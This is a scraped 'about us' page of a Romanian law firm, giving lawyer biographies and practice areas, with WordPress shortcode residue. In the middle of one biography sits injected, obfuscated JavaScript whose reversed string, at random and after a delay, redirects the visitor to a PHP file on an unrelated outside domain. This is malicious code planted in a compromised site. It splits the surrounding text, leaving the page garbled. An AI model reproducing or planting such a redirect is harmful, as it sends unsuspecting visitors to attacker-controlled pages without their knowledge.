Copyright 2016 Silvan Gavenea.
Toate drepturile rezervate.
 

despre noi

”Adriana

”avocat”

”Biografie”

”Adriana

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andite potrivit Legii nr. 84/1998 privind protectia marcilor si modelelor industriale, chestiuni legate de configurarea dreptului de proprietate (asistenta juridica in materia transmiterii dreptului de proprietate-contracte, succesiuni), litigii comerciale.
A absolvit cursul de English Legal Methods organizat de Cambridge University.” team_social_icon_1_link=”https://twitter.com/” team_social_icon_2_link=”https://www.linkedin.com/” team_name_color=”#ffffff” team_position_color=”#ffffff”]
a

Silvan Gavenea

avocat

Biografie

Silvan Gavenea este avocat, membru al Baroului Bucuresti, din anul 1999 si practician in insolventa (lichidator), membru al Uniunii Nationale a Practicienilor in Insolventa din Romaniadin anul 2005. De asemenea, face parte din corpul de arbitri de pe langa Oficiul Roman pentru Drepturile de Autor.

Domeniile sale predilecte de activitate sunt legate de dreptul comercial: litigiile comerciale, falimentele, achizitiile si fuziunile, dreptul societar.

A absolvit cursul de English Legal Methods organizat de Cambridge University.